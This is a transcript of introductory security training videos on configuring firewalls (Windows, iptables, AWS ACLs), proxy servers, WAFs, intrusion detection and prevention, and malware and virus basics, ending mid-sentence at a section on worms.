[Topic title: Configure a Packet Filtering Firewall. The presenter is Dan Lachance.] In this video, we'll take a
look at how to go about configuring a packet filtering firewall. There are plenty of packet filtering firewall
solutions out there. Some are newer. Some are older. Some are command line based. Some are GUI-based
through a web interface. It just goes on and on. We're going to start by taking a look here at the built-in
Windows Server Operating System Firewall. So I'm going to go to my Windows Start menu and type in fire.
And I'm going to click on Windows Firewall with Advanced Security. Here in this tool, I can see on the left,
I've got a number of inbound rules, as well as a number of outbound rules to control traffic leaving this server.
If I go back to Inbound Rules, you'll notice that the icon to the left of some of the rule names looks like a green
circle, which means it's a rule that's enabled. Whereas others look like a golden padlock, which means it's a
rule that only allows access if there's some kind of a secured connection. Either using IPsec or maybe the rule
is configured to only allow connections from certain user accounts or computers. Any rules that have a grayed
out icon are disabled. So we're going to go ahead and right-click on Inbound Rules on the left and choose New
Rule. We're going to build a rule to allow inbound SSH traffic.
Now there's not an SSH service by default in the Windows Server OS, but certainly we could install one. So
let's assume that we've got one installed and we want to allow connections to it. So we're going to go ahead
and choose Port. We could also alternatively have built a firewall rule based on a program or from the
predefined list of common things that are done. Or we could build a custom rule. Here it's going to be a port.
So I'll choose that and I'll click Next. We know that SSH uses TCP port 22. So I'm going to go ahead and
specify that specific port. But notice in the example, I could have a comma separated list of ports I want to
allow through this rule. Or a range of ports with a starting and ending range and, of course, it is inclusive. So
I'm going to go and click on Next.
I want to allow the connection. Although I could choose allow the connection if it's secure. Again, I could do
that for IPsec or to make sure that only certain user accounts or SSH connections can only come from a certain
computers. I could also block the connection. But in this case I want to allow it. So I'll go ahead and click
Next. In Windows, we have various profiles that apply, depending on if the user is connected to an Active
Directory domain network, a private network, or public.
So what I want to do here is make sure that this only applies when people have their computers at work. Or in
this case where it’s a server it would never be on a different network like at Starbucks or on a home private
network. So, I'll go ahead and click Next, going to call this Allow inbound SSH. And I'll go ahead and click
Finish. And we can see now in the list we've got an active rule, it's got the green circle with the white check
mark, called Allow inbound SSH. Now of course we could do this from the command line using PowerShell
commandlets if we really wanted to. However, let's take a look at how we would configure a simple packet
filtering rule on the Linux platform. Most Linux distributions support the old iptables command as a way of
configuring packet filtering firewall rules. Although there are other options, including graphical ways of
configuring tools. Here we're going to type iptables -L for list. Here we can see that our input chain has a
policy of accept. So it's going to accept everything from anywhere going to anywhere on this host. What we're
going to do is we're going to make sure it only allows SSH. So, I'm going to type iptables -A. I want to add an
INPUT rule item for -p, protocol is tcp. I want to match tcp -m, and the destination port or dport is going to be
22, because that's what SSH uses. So then -j ACCEPT.
I don't want to drop, I want to accept that traffic. And I'm also going to add another rule here. So iptables -A in
the INPUT chain -j DROP. Basically all I want to allow is inbound SSH and drop everything else. So now if I
type iptables -L for list I can now see that we're allowing inbound SSH for the TCP destination port and then
dropping everything else. Let's test to see if that's actually working correctly. Before we test this let's type
ifconfig to see what our IP address is. And here we can see clearly it's 192.168.1.91. Okay, let's go test it. From
a different computer I'm going to ping 192.168.1.91 and notice of course we don't get a response. Because that
traffic should be dropped. The only thing allowed into that Linux host is SSH. So naturally we're going to try
to use PuTTY to open up an SSH session to that same IP address. So we can see we're going to open up an
SSH session on Port 22 on that same IP address. So I'll go ahead and click Open.
And after a moment it asks me to log in. So I'm going to go ahead and specify the appropriate credentials and
we are in. Again if we do an iptables -L for list, we can see the rules that are in place to make this happen.
Another type of packet filtering solution is in the cloud. Here I'm connected to my Amazon Web Services
account where I'm viewing one of my VPCs or Virtual Private Clouds called PubVPC1. A VPC is just a
network that you've defined in the cloud. But what's interesting is that you can define a network ACL or
Access Control List for each VPC in the Amazon Web Services Cloud. The same types of things are possible
with other cloud providers like Microsoft Azure as well. So having that VPC selected here in the list, I'm going
to go down and click on the link next to network ACL. That's going to open up another window where we can
actually start to work with the packet filtering rules for this network, which it actually exists in the cloud.
Having my network ACL selected down below I can see the Inbound Rules tab where we have a list of
inbound rules. Which in this case is allowing traffic from anywhere into the network. In the same way, we've
got Outbound Rules to control traffic leaving this cloud network. So, I'm going to go back to the Inbound
Rules tab and click the Edit button. What we want to do here is change our first rule to allow, not all traffic,
but in our example, only SSH port 22 traffic. And I'll leave the source as 0.0.0.0/0 which means from
anywhere. Now, we don't want this second custom rule being built here. So, I'll click the x to remove that and
I'll click Save. Now, after a moment, that network ACL for that cloud virtual network is now saved. And we
can see down below that we are allowing inbound SSH traffic but blocking everything else. Because the
second rule is a DENY rule. In this video, we learned various ways to configure packet filtering firewalls.
[Topic title: Proxy Servers. The presenter is Dan Lachance.] In this video, I'll talk about proxy servers. A
proxy server eliminates direct connectivity between internal clients and Internet resources, and depending on
the type of Proxy Server, Internet clients connecting to internal resources like a protected web server. So
really, we're talking about protecting the host's identity, where outgoing traffic appears to come from the
proxy.
So that way, the true internal IP address of the host is never known. So, we must configure a proxy server for
specific applications. So, we would have HTTP proxies, FTP proxies, and so on. Transparent proxies don't
require any client configuration. So in other words, as long as the client is configured with the default gateway,
that device, the default gateway, would normally be their proxy server that they connect through to request
content from the Internet. But again, with a transparent proxy, you don't have to go, for instance, into your web
browser and tell it the address and port number of the proxy server. Proxy servers are designed to retrieve
Internet content for internal requesting clients. And that content can be cached to speed up requests for the
same stuff later.
However, the great thing about this is that the internal client identity is never revealed. Now, proxy servers
examine not only packet headers, like a packet filtering firewall, but they also can examine the payload. So for
instance, that means the proxy server would be able to block connections to facebook.com even outside of
specific hours. Now, on a proxy server device, we want to make sure IP routing is disabled. Because we don't
want things being routed out to the Internet at the IP level, thereby bypassing the proxy server. We want the
proxy server to have to examine everything. Proxy servers are sometimes also called caching servers. And it
really depends on how the proxy server gets configured as to whether or not it's configured to cache content.
Proxy servers can also be configured to prefetch Internet content on a scheduled basis. The result of this is that
it speeds up access for that content when clients actually request it. So for instance, if we know that every
morning users need to see information from certain webpages, we can have that pre-cached to speed up their
experience. But we also have to consider the static and dynamic nature of the cached content.
If it's stock quotes that change all the time, we probably wouldn't want to prefetch that type of streaming
information. We can also configure cache aging timers, which is often called the Time To Live or TTL. So,
once data is expired after it's been cached, that cached content gets removed from the server. A reverse proxy
server listens for connection requests for a given network service. So for example, it might listen for TCP port
80 web site connections. Incoming connections to the reverse proxy server get forwarded to an internal host
elsewhere. So for instance, we might forward requests to a protected web server elsewhere listening on either
port 80 or some other port. Normally, reverse proxy servers are placed in a demilitarized zone for publicly
accessible services.
So, it protects the true identity of the internal host offering that network service and it's completely transparent
to external users. They think they're connecting to the real thing. So, this is great because the fact that we're
even using a reverse proxy isn't even know by client devices. There are public proxies that are available out on
the Internet that can anonymize Internet user connections. Now, this could be used for example to allow the
bypassing of normal surfing restrictions, such as media content that is only served within certain countries.
Well, using a proxy anonymizer on the Internet, you can make it look like you're coming from another country.
Now, I'm not suggesting that that's something you should do. It may or may not be legal where you are, but it
is possible. It's part of the technology that's out there. Another way a pubic proxy might be used is so that we
could use social media that's normally prohibited at school or at work. But again, if the rules are in place,
there's usually a good reason, especially at work. So, in essence what it really means is that the Internet user
appears to be initiating connections from a different location. Common proxy server products include Squid,
WinGate, the Cisco Web Security Appliance, and Check Point's Security Gateway. In this video, we talked
about proxy servers.
After completing this video, you will be able to explain the purpose of a security appliance.
Objectives
[Topic title: Security Appliances. The presenter is Dan Lachance.] Firewalls are used to control network
traffic flow by either allowing or denying traffic based on configured criteria. But what about using more than
one type of firewall at once? In this video, we're going to address that by talking about security appliances.
A security appliance is a type of firewall and in some cases it might be specialized. So for example, it might be
focused on intrusion prevention. But at the same time, a security appliance might also be an all-in-one multiple
capability firewall. So that could come in hardware form, where it might be rack-mounted equipment in a
server room or a data center. Or it could come in software form, where we might use various preconfigured
virtual machines that are pretty much ready to go, just a little bit of tweaking is required to get them running as
a security appliance. Of course, you could install your own physical or virtual machine and configure multiple
firewall products manually.
Security appliances, because of their nature, could be an all-in-one firewall, so their capabilities are quite far
reaching. They will have the ability to perform stateful packet filtering with the configuration of network
ACLs. They will have proxying capabilities. In some cases, also reverse proxying. They'll be able to filter
traffic at layer seven of the OSI model, application specific. They might also serve as a VPN appliance, to
allow VPN connections into a private network. A security appliance could also have intrusion detection and/or
prevention capabilities. It might also check for malware, it might also have antiphishing built in. Might even
have video surveillance capabilities built in. So as you can see, a security appliance really could be all
encompassing. It really depends on the specific vendor product that you're using as a security appliance.
Pictured on the screen, we've got an example of a security appliance being connected to through a web
browser. [A screenshot displaying an example of a security appliance connected to a web browser is
displayed. The image is divided into many sections, some of which are Appliance Information, License
Information, Signature Information, Connection Information, CPU usage for last two hours, and Memory
usage for last two hours.] Now, what we can see in the license information section are the components of the
security appliance. The first one is a web and application filter. The second component is Intrusion Prevention
System, IPS. Then we've got antivirus, antispam, we've got a web application firewall and so on. So security
appliances usually have a nice web-based interface that's easy to navigate, so you can not only configure the
various firewall capabilities. But also monitor them or maybe even configure notification when certain events
occur. Some common examples of security appliances include SonicWALL's Network Security Appliance,
Barracuda Web Security Gateway, Cisco Meraki, and also Check Point Security Appliance. In this video we
talked about security appliances.
After completing this video, you will be able to recognize the unique capabilities of web application firewalls.
Objectives
[Topic title: Web Application Firewall. The presenter is Dan Lachance.] In this video, we'll talk about Web
Application Firewalls. A Web Application Firewall is often referred to as a WAF, spelled W-A-F. It's specific
to HTTP connections, and it's designed to mitigate HTTP specific attacks, including things like cross-site
scripting or XSS.
With cross-site scripting, we've got a malicious user that tries to inject scripts that get executed in the client
web browser into web pages. And sometimes this is possible if the developers of a web page haven't carefully
validated the input into the fields. So an attacker then could put some kind of executable script in there. And
then that page would be viewed by an unsuspecting victim where that client side scripting code would execute
within their web browser and do malicious things. Now, another type of HTTP attack handled by web
application firewalls, among many others, are SQL injection attacks. Now, again, this is usually executed by a
malicious user inputting database instructions within a field that isn't properly validated on a web form.
And so, the web server then, takes that data in, and executes it against a back end database where it might
reveal information from the database that otherwise wouldn't normally be. Web application firewalls of course
can be customized due to the various different technologies that might be used with web services. And they are
more specialized than packet filtering firewalls because packet filtering firewalls apply up to layer four of the
OSI model. Now, that deals with things like port addresses, where layer three deals with things like IP
addresses and essentially looking at different packet header fields. But here, we're talking about looking at a
little bit more detailed information within the packet payload, essentially up to layer seven. So the web
application firewall then can come in the form of an appliance, either hardware or software based. It could also
be a server operating system plugin. In the cloud we might have web application firewall services offered by
the cloud provider or if not we might have a virtual security appliance from a specific vendor that we're
running in the cloud as a virtual machine. Take for example Barracuda, where we take a look at their virtual
appliances listed over here on the right hand side of the screen. [The barracuda web site is open. the right-
hand side of the page displays a section named barracuda Virtual Appliances which includes many
subsections, some of which are Barracuda nextGen Firewall F Vx, barracuda Email Security Gateway Vx, and
Barracuda Web Application Firewall Vx.] And there are many vendors that do this, so if we scroll down the
list of virtual security appliances, eventually we'll come across the Barracuda Web Application Firewall. And
of course, if we click on that link, we'll get some details related to it.
And essentially what we're talking about doing with this is bringing down a virtual appliance that we can then
deploy either on-premises or even In the cloud. Web application firewalls are normally configured and
monitored through an HTTPS connection. The web application firewall can also do many other things like
monitoring traffic entering and leaving a specific web app, and so we can detect abnormal HTTP activity. It
sort of has intrusion detection capabilities built in. So it might look for abnormal activities such as large
volumes of unexpected data input to a web application. So this could indicate that a buffer overflow attack is
being executed. Or it could indicate that we've got a denial of service, or if many machines are involved, even
a distributed denial of service attack that's in progress. Also, abnormal database query strings supplied as input
would indicate perhaps a SQL injection attack. So this can be monitored at the web application firewall level.
However, application developers still need to follow secure coding practices to do things like validate input
correctly on web forms. Common web application firewall products include those from NAXSI, which
includes Nginx which is anti-cross site scripting and SQL injection. Also ModSecurity which is open source,
products from Imperva, the Cisco NetScaler product and also appliances from Barracuda. In this video, we
talked about Web Application Firewalls.
After completing this video, you will be able to explain the importance of intrusion detection and prevention.
Objectives
[Topic title: Intrusion Detection and Prevention Overview. The presenter is Dan Lachance.] Today's
networks, more than ever, are potentially susceptible to malicious activity. This could be due to things like the
use of smartphones by everybody to connect to corporate resources and things like ransomware. In this video
we'll talk about intrusion detection and intrusion prevention.
Host Intrusion Detection Systems, or HIDS, are specific to a host, which normally would be running some
kind of specific application that we're trying to protect from malicious activity. But we can also use Network
Intrusion Detection Systems, or NIDS. Network Intrusion Detection Systems aren't specific to a host, but
instead are placed carefully on the network to look for anomalous network activity. So the detection part
comes through monitoring, where one way to do this is to monitor data, current activity data, to a known threat
database. Or compare it to a baseline of normal activity that was taken within a specific environment. Intrusion
detection also can log suspicious activity. Now in that case, we want to make sure that wherever that
information is logged to is kept secure.
So for instance, we might enable log forwarding from a device where we've got intrusion detection being
monitored so that it gets stored elsewhere. We can also correlate current data with related or even older data
historically, to determine that some kind of suspicious activity is taking place. Intrusion detection can also send
notifications to administrators about suspicious activity. Intrusion prevention comes in a couple of forms,
including Host Intrusion Prevention Systems, or HIPS. Of course, much like with intrusion detection, there's
also Network Intrusion Prevention Systems, or NIPS, that work at the network level. Now not only is detection
possible with intrusion prevention, but there can also be an attempt made by the solution to prevent further
damage.
Now intrusion detection and prevention solutions could come in the form of physical hardware, or a virtual
appliance, or software installed within a server OS. Now with intrusion prevention we monitor for suspicious
activity, we can compare that to known threat database problems or against a baseline of normal activity, just
like with intrusion detection. But intrusion prevention allows us to extend that a bit further. So besides the
normal logging of suspicious activity or correlating with current related or older data, and sending notifications
about this activity. Intrusion prevention systems can be configured to attempt to stop the activity once it's
detected. Now this could come in many forms depending on what it is it detects. For instance, we might have
our intrusion prevention system configured to block connections from offending IP subnet ranges or addresses
if we've got suspicious activity from those sources. Or maybe to block a port for an attack that's in progress.
Now you might want to be careful with this when you configure the parameters for that kind of setting.
Because if we're talking about a web server, and it's looks like it's being attacked with a distributed denial of
service attack, do you really want block that web server port, because you're also preventing legitimate
connectivity. But the argument against that of course is that well, legitimate activity won't occur anyway if it's
being overloaded with useless traffic. We should also consider whether we want to quarantine things like
suspected malware or suspected processes. This is also considered suspicious activity. This needs to be
configured for the specific environment that you want to use this in. And the reason is because you might end
up with too many false positives, things that could potentially appear to be suspicious and therefore you might
be closing ports or stopping processes when in fact they're benign. So it is specific to each and every
environment. In this video we did an intrusion, detection, and prevention overview.
After completing this video, you will be able to recognize when to use a HIDS.
Objectives
Now, the data would be current activity data that is being captured by our Host Intrusion Detection System. It
can also compare current activity data to a baseline of normal activity. But that's only going to work properly if
a baseline of normal activity for a given host has already been taken. You might have to capture activity, for
example, perhaps for a few days or for an entire work week on a system to determine what's normal in the first
place. Because from that our Host Intrusion Detection System can then have some kind of relative comparison
point or reference point where can determine what is suspicious or abnormal.
The Host Intrusion Detection Systems might come in a hardware form, it might be rack mountable equipment.
Or it might be software you install within a server operating system. It might be a dedicated virtual machine
appliance that you run on-premises or in the cloud. There are many various solutions available. Host Intrusion
Detection Systems are designed to monitor details or activity related to a specific application. However, it's
common that you need to train your Host Intrusion Detection solution for your specific environment. Some
HIDS solutions have a learning mode where you can have them establish a baseline of normal usage activity.
However, you might also have to manually configure specific rules or tweak them yourself to eliminate false
positives. A false positive is essentially a triggered alert for something that the system thinks is suspicious
when in fact it's actually normal and benign. So, what we see on the screen then is an example of a Snort rule.
The Snort IDS or Intrusion Detection System, is a common open source IDS solution. So, in this example, we
are configuring an alert. [The following code is displayed: alert icmp any any -> any any (msg:"ICMP Traffic
Detected";sid:3000003;). Code ends.] What it's going to do is generate an alert if there is any ICMP traffic
from any host to any host, and we're assigning it a Snort ID rule, here seen as 3000003. And we can determine
if we configure Snort further, whether we are generating email modifications, writing to a log or doing both
and so on. So that's a sample Snort IDS rule. How you configure the rules will vary depending on your
solution. Some are more graphically based whereas Snort here we can see allows us to configure our rules at
the command level although it does give us increased flexibility this way. With a Host Intrusion Detection
System it has the ability to run on a host itself as opposed to a network. What this means is for applications that
deal with network encrypted data that network encrypted data gets decrypted by the host. This means then, that
the decrypted version of that data is then available for IDS examination. Whereas, with a Network Intrusion
Detection System in most cases any encrypted network data isn't examined by the Network Intrusion Detection
System. There are some exceptions because there are some Network Intrusion Detection Systems that do have
the ability for you to specify an encryption key. Or to import, for example, a PKI certificate that contains a
decryption key. In this video we talked about Host Intrusion Detection Systems.
[Topic title: Network Intrusion Detection Systems. The presenter is Dan Lachance.] In this video we'll talk
about network intrusion detection systems. Network intrusion detection systems are often referred to as NIDS.
It's designed to look for inappropriate or unauthorized use specifically on a network as opposed to a specific
host on the network.
So it can be configured to compare data that's current activity data to known threats on the network. Or it can
be configured instead of or in addition to, to compare current activity data on the network to a baseline of
normal activity. But much as is the case with a host intrusion detection system, a network intrusion detection
system has to have an existing baseline of normal activity.
And what's normal on a network within one company will be different from what is normal on a network for a
different company. So it is specific to an organization. We need to consider the placement of the NIDS on the
network. So for instance, if we want our network intrusion solution to be able to monitor all network traffic,
we must make sure it's placed appropriately so that it can see all network traffic. So if we were specifically
doing this for Internet traffic, inbound and outbound, we'll probably want to make sure that our NIDS is in the
middle of the connectivity between our internal network and the Internet. In the case of network switches, we
might have to plug our network intrusion detection system into a specific switch port. And the switch
administrator might have to configure port forwarding or copying of data for all ports to the one that the NIDS
is plugged into. Just like with host intrusion detection systems, a NIDS could be a hardware appliance.
Or it could be software installed in a server operating system, or it might be a specialized operating system. An
appliance essentially, whether it's virtual that you run in the cloud, or a virtual appliance that you run on
premises. The network intrusion detection system needs to be trained for your specific environment, again,
similar to a host intrusion detection system. Many NIDS solutions will have a learning mode, where essentially
you can configure it to monitor activity for a period of time to establish a baseline of normalcy in your
environment. You can also instead of or in addition to, normally it's in addition to, configure specific rules for
what is considered suspicious network activity and what to do about it. And also you can tweak it to eliminate
false positives. On the encrypted network data level, generally speaking network intrusion detection systems
can't examine encrypted data. Now of course, as always there are exceptions to every rule.
There are some NIDS systems that will allow you to specify decryption keys in various forms so that they can
examine encrypted data. But generally speaking, this is not the case. So we might have one solution that does
allow us to enter perhaps a symmetric key or phrase, or even to import a PKI certificate for decryption. A
NIDS looks for various hints of abnormal network activity. And that's going to include things like
reconnaissance. Reconnaissance is one of the first phases an attacker would undertake before they start to try
to exploit vulnerabilities.
Basically, it's learning for the malicious user about what's out there. This can be done through ping sweeps to
determine which hosts are actually up and running on the network. Or conducting port scans to identify which
network services are running on hosts on the network. Also it includes SNMP scanning. SNMP stands for
Simple Network Management Protocol. This has been around for decades. And it's a way for us to use a
management station to query information about a network device, whether it's a server, a router, a switch and
so on. So we can get statistics through SNMP by querying an SNMP MIB, Management Information Base. Or
in some cases SNMP can also be used to write configuration changes over the network to network devices.
SNMP normally occurs over UDP port 161. So that might be something we want to consider when configuring
packet filtering rules.
Network exploits, essentially, can be determined because a malicious user will normally try to test discovered
targets for weaknesses. And that might not be normal activity against a service. So for instance, running a
Telnet session to poke and prod at an HTTP server, instead of actually issuing a standard HTTP GET request
to retrieve information from the web page, could be an indicator of suspicious activity. We might also have a
NIDS that looks for hints of denial of service attacks. A denial of service attack, or DoS, D-O-S, essentially is
excessive traffic or activity on a specific host beyond normal usage. Now that might be executed by locally
installed malware or it might be executed even over the network. Common network intrusion detection
products include the Snort open source tool, AlienVault Unified Security Management, or USM, and Symantec
NetProwlers, among many solutions. In this video we talked about network intrusion detection systems.
Upon completion of this video, you will be able to recognize when to use the NIPT test.
Objectives
[Topic title: Network Intrusion Prevention Systems. The presenter is Dan Lachance.] In this video, we'll go
over network intrusion prevention systems. Network intrusion prevention systems are often called NIPS, N-I-
P-S, for short. They're designed to look for inappropriate or unauthorized use at the network level. So network
activity then is monitored and compared against known threats or compared against a baseline of normal
activity taken for that network.
Similar to network intrusion detection systems. We should consider the placement of the network intrusion
prevention solution on the network. Because if we needed to see all network traffic then it must be placed
accordingly on the network. Maybe within a demilitarized zone if that's what we're looking for in terms of
network intrusions. Or maybe it needs to be on an internal switch port that can see all traffic within the switch.
Intrusion prevention allows us not only to identify potential suspicious activity as network detection does.
But it has the added benefit of being able to do something about it, like responding to threats immediately.
Now it can prevent the exploit of vulnerabilities once suspicious activity is detected and we have to think about
the placement again of this solution. Because it needs to be between the potential threat and the asset that's
being protected. So, for example, our network intrusion prevention solution might be placed after the Internet
firewall, but before our web application server. If that's what we're looking for in terms of network intrusions.
Some prevention actions that are available include the ability to log suspicious activity and notify
administrators of it. Now, that could be considered prevention, of course, not real time, in that administrators
could take action. However, that makes this no different then from a network intrusion detection system. Now,
what makes it a network intrusion prevention system is the ability to do things like dropping suspicious
packets, blocking connections based on IP subnet ranges or individual addresses. Resetting specific sessions
that seem suspicious, or quarantining malware or suspicious processes. There are many products that allow us
to implement network intrusion prevention. And some of them will support, of course, both network intrusion
detection and prevention within the same solution, whether it's a hardware appliance or a software solution.
Common products include the open source Snort tool, Trustwave's Intrusion Detection and Prevention
solution, and Symantec NetProwler. In this video, we talked about network intrusion prevention systems.
Find out how to prevent threats from materializing and follow proper forensic procedures.
Objectives
Exercise Overview
[Topic title: Exercise: Prevent and Investigate Security Problems. The presenter is Dan Lachance. ] In this
exercise, you'll begin by differentiating packet filtering firewalls from proxy servers. Then, you'll differentiate
host intrusion detection systems from host intrusion prevention systems. You'll then explain ransomware.
You'll then view deleted files on a hard disk. And finally, you'll configure the Windows firewall to allow
inbound SSH traffic from the 172.16.0.0/16 network. At this point, pause the video, go through each of these
exercise steps and then come back here to view the results.
Solution
Packet filtering firewalls allow or deny network traffic. Criteria can be based on the packet headers but not the
content or the payload in the packet itself. So we can build our criteria based on source and destination IP
addresses, source and destination ports, protocol type and so on. Proxy servers, on the other hand, can protect
the identity of internal clients. This is because outgoing traffic is really done by the proxy server on behalf of
the internal client. And proxy servers also have the ability to examine application level data. So they can look
all the way down into the payload, or data within the packet, beyond just its headers, like packet filtering
firewalls do. A Host Intrusion Detection System, or HIDS, runs on a specific host and can examine host
processes and logs. It can examine application-specific nuances, and then it can detect anomalies related.
The anomalies can be logged, and/or notifications sent. With an Intrusion Prevention System, in this case a
Host Intrusion Prevention System, the added capability is of stopping suspicious activity beyond just logging
and notifying of it. Ransomware is a form of malware where the computer system use could be blocked while
waiting for a payment. And then otherwise, if the payment is made, then some kind of a code is given to the
victim and they can continue using their system. Another form of ransomware will encrypt files. And in the
same way, the ransom must be paid, in this case, before the files are decrypted. There are hundreds of tools
that can be used to view deleted files, in this case, on the Windows platform. Here I'm going to use the
Restoration tool, [Dan accesses the Restoration tool and the Testoration Version window opens.] where I can
tell it which disk I want to view. And then I can simply put in wildcards if I only want to see certain types of
files. Or I can just click Search Deleted Files if I want to see them all. While the Windows firewall can be
configured here in the GUI, it can also be configured at the command line. For instance, using PowerShell
cmdlets. Here we'll use the GUI. So we're going to build an inbound rule as the exercise stated. So I'll right-
click build a New Rule. [He right-clicks the Inbound Rules subnode and selects New Rule from the shortcut
menu and the New Inbound Rule Wizard opens.] It's going to be based on a Port, because it was for SSH. So
the port number is going to be TCP port 22. And I want to Allow the connection. And I'll apply to all of the
network profiles, and I'll specify a Name. I'll call this SSH In. Now after the rule is created for SSH In, I'm
going to double-click and open it up and [The SSH In Properties dialog box opens which displays many tabs
such as Protocols and Ports, Scope, and Advanced.] click the Scope tab, where I can specify IP address ranges
where we can allow connections from. For example, 172.16.0.0/16, [He enters the IP address in the IP
Address window.] as was required in the exercise.
Table of Contents
[Topic title: Malware Overview. The presenter is Dan Lachance.] In this video we'll do a malware overview.
Malware is malicious software. This type of software gets installed and runs on a machine without user
consent or through trickery. Malicious user motivations for creating, deploying and using malware comes from
financial purposes, bragging rights. There could be political or ideological reasons why they are executing
these type of infections, or simply for reconnaissance to learn more about a potential target that they want to
compromise. Malware types come in many forms. We could have viruses which attach themselves to files,
worms, which are self-propagating over the network using standard file sharing methods, or Trojans, which
essentially look not suspicious, but rather they look legitimate, they look benign. But they in fact contain a
malware payload. Or we could have spyware that monitors our activity, for example, our web surfing habits or
our banking habits. But how does a malware infection actually occur? Well, this list is just the tiniest of
samplings. There are many ways this can occur. One way is by people downloading BitTorrents. Whether
they're downloading the latest movie that's in the theaters that perhaps they really shouldn't be doing due to
copyright laws, or they're downloading things that they otherwise would need to pay for legitimately. Often
with a BitTorrent download indeed it does contain what the user was looking for, for example, the latest
theatrical release of a movie. But at the same time, when that movie is run it could be executing malware in the
background, unbeknownst to the user. Even viewing a web site in some cases can infect a machine without
even clicking anything on the site. This is often called a drive-by infection.
Now, it does depend, of course, on the web site and its nature of malicious content. But it also depends on the
user's web browser and how it's configured. Now certainly, if the user gets a message about their computer
being infected and then they click on a link to run a scan, which in itself is really infecting the machine. That's
the user actively clicking on something. But there are times when the user doesn't have to click on anything
and their machine can still be infected. So installing software that seems benign, such as, for instance, a virus
scanner, or any type of free software especially. Clicking a web site link that a user might receive in an email,
and often these are targeted to users. And the text in the message is often convincing to trick the user into
thinking this is specifically for them. Maybe to reset a banking account password or so on. Opening file
attachments should also be approached with suspicion. Unless we are expecting a specific file attachment, we
should be very careful as to whether or not we're going to open it. Symptoms of a malware infection include
things like performance degradation on the machine, so the machine slows down. We might also get email
notifications regarding abnormal account usage.
And it might actually be legitimate. We might get an email notification from our bank, or PayPal or our email
account, whether it's Google or Outlook.com. But we have to be careful. Because how do we know that this
email notification itself isn't some form of social engineering or trickery? Any unexpected change settings on
the machine could potentially indicate an infection. It could also have been pushed centrally by an
administrator's configuration change. However, things like web browser start pages being changed and not
being able to be changed back, or processes running in the background that we're not familiar with, potentially
could indicate an infection. But you want to be careful because sometimes they could be legit. Any unexpected
newly installed web browser plugins could also be an indication of an infection, as are disabled software
update mechanisms. A malware toolkit facilitates the creation of malware for a malicious person. And there
are many of them out there, believe it or not. So, for instance, the Blackhole exploit kit contains tools and
tutorials and documentation on how to create and propagate malware. There are also underground chat rooms
on the Internet that are available. And of course, membership is by invitation only, where there is actually
malware for sale to the highest bidder. So how do we mitigate malware? Number one, user awareness and
training. Everybody in the organization needs to be in the know about understanding how easy it is to infect a
machine even through trickery or social engineering.
We should also make sure we've got up to date antimalware scanning on all devices, including smartphones.
The same thing is true for personal firewalls. It needs to be on every device, looking at traffic coming into the
device and leaving the device even at the smartphone level. We should always, within the corporation, limit
use of removable media because that's one way that infections can be brought into an environment. Of course,
your antimalware scanner might pick it up before it causes damage. We should also limit Internet file
downloads and be very suspicious when opening links in email messages, as well as opening file attachments
from email messages. Common malware products or rather antimalware products include those from
Kaspersky, McAfee, Sophos, AVG and Windows Defender. Now just because we might be using a free
antimalware solution like Windows Defender, doesn't necessarily mean it's not as good as some of the paid
solutions. Now of course with a malware solution at the enterprise level, we want some kind of centralized
way to deploy and control the configuration of our antimalware and also have some kind of central notification
and reporting mechanism available. Now in that case, you might have to pay for a solution that does that. But
just because you're paying for an antimalware solution doesn't necessarily mean it's better than the free ones. In
this video we discussed malware.
identify viruses
[Topic title: Viruses. The presenter is Dan Lachance.] In this video, we'll discuss viruses. A virus is a form of
malware that installs and runs without user consent or through trickery, or maybe a combination of both. By
tricking the user to install software that looks legitimate but unleashes a virus in the background. Viruses
normally replicate themselves by attaching to data files, scripts, executable program files, or even disk sectors
in some cases. The way that viruses get transmitted is often through e-mail file attachments that people open,
or in some cases, through files that people download from the Internet. The timing of the virus is such that it
might be executed immediately upon infection, or in some cases, it might wait for a specific date of some
significance or some kind of condition to be met on the machine. So this type of virus that waits for a date or
condition to be met is called a logic bomb. In the 1990s, this is exactly what the Michelangelo virus was about.
It waited until March 6th, in the early 90s, before it would execute. Back in the early 90s, Michelangelo was
transmitted through infected floppy discs. Which these days, can be done through infected USB drives, with
other forms of malware, or infected file downloads from the Internet. The idea with the Michelangelo virus
was that it was a boot sector infecting virus. So when the OS booted, it was resident in memory.
And was, supposedly on Michelangelo's birthday, supposed to wipe out the hard disk by overwriting it with
random characters. But in the end, on March 6th of 1992, very few computers were actually affected by the
Michelangelo virus compared to the ominous predictions. A macro virus is embedded in the macro language
code for a specific application. For example, a Microsoft Word macro virus could trigger when a user opens an
infected document that would trigger ransomware to encrypt their files. Of course, the user would then have to
pay a ransom to potentially receive a decryption key. So one thing that we could do is disallow the autorunning
of macros, such as when files are opened. We could only allow the use of trusted and digitally signed macros.
Or, if we don't use macros at all, we're probably better off completely disabling it to reduce our attack surface.
Consider the example of macrosecurity here in Microsoft Excel. [A Microsoft excel file named Book1 is
open.] I'm going to go to the File menu, where I'm going to go all the way down to Options. [The Excel
Options dialog box opens which displays many tabs. Some of the tabs are General, Formulas, Proofing, Save,
language, Advanced, Customize Ribbon, Quick Access Toolbar, Add-ins, and Trust Center. The box also
includes buttons named Ok and Cancel.] On the left, I'll then click on Trust Center. And then on the right, I'll
click the Trust Center Settings button. [The Trust Center dialog box opens. The box is divided into two
sections. The first section displays many tabs such as Macro Settings, Protected View, Trusted Locations, and
Message Bar. The Macro Settings tab is selected by default and the second section displays information
related to the selection made in the first section. Information on Macro settings and Developer Macro Settings
is displayed. In the macro settings section, The Disable all macros with notification is selected by default. The
box includes two buttons named Ok and Cancel.] Here on the left, you can see that Macro Settings are
selected. So on the right, it's currently set to disable all macros with a notification.
But there are other options, such as disabling all macros without a notification, disabling all macros except
those that are digitally signed and, of course, trusted. Or, we could enable all macros, which is definitely not
recommended. And again, if your users don't even use macros, you might completely disable it in this specific
application. Now, here in Microsoft Excel, over on the left, we've also got Trusted Locations. [Dan clicks the
Trusted Locations tab and the second section displays the Trusted Locations.] In other words, locations on the
network from which we are allowed to open files. So files in other folders might not be trusted and might
prompt us with a warning message. There are countless virus examples, including 2009's Stuxnet virus. This
one damaged uranium enrichment equipment in Iran, and it was propagated as a worm. So it was self-
propagating over a network. 2009 also saw the Conficker virus, which was a botnet infector. Botnet, of course,
is a group of computers under single malicious user control. And of course, now in 2016, we keep hearing
about occurrences of ransomware. So in various ways, this malware is triggered, such as opening an infected
document or clicking a link. And what happens is, it could infect files by encrypting them and requiring a
ransom payment before potentially providing a decryption key. In this video, we talked about viruses.
identify worms
[Topic title: Worms. The presenter is Dan Lachance.] In this video we'll discuss worms. Worms are a form of
